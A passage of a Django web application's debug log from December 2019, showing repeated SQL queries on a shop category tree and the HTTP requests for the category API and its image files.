"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:21:41,456 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:21:41,460 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:21:41,464 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:21:41,467 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:21:41,474 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:21:41,478 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:21:41,482 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:21:41,486 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:21:41,490 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:21:41,494 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:21:41,499 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:21:41,503 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:21:41,507 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:21:41,512 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:21:41,516 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:21:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:21:41,619 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:21:41,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 06:21:41] "GET /api/v1/categories/10 HTTP/1.0" 200 353 [20/Dec/2019 06:25:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:30:06,300 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:30:06,308 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:30:06,311 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:30:06,323 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 06:30:06] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 06:30:06,329 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:30:06,334 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:30:06,341 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:30:06,345 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:30:06,350 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:30:06,354 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:30:06,358 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:30:06,364 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:30:06,368 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:30:06,372 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:30:06,376 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:30:06,380 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:30:06,388 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:30:06,392 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:30:06,396 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:30:06,401 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:30:06,405 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:30:06,412 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:30:06,416 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:30:06,421 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:30:06,425 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:30:06,429 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:30:06,433 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:30:06,440 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:30:06,445 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:30:06,449 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:30:06,453 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:30:06,458 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:30:06,464 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:30:06,468 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:30:06,472 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:30:06,477 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:30:06,481 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:30:06,491 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:30:06,496 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:30:06,501 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:30:06,507 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:30:06,512 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:30:06,515 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:30:06,518 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:30:06,520 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:30:06,523 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:30:06,526 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:30:06,528 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:30:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 06:30:06] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 06:30:07] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 06:30:07] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 06:30:07] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 06:30:07] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [20/Dec/2019 06:30:07] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [20/Dec/2019 06:30:11] "GET 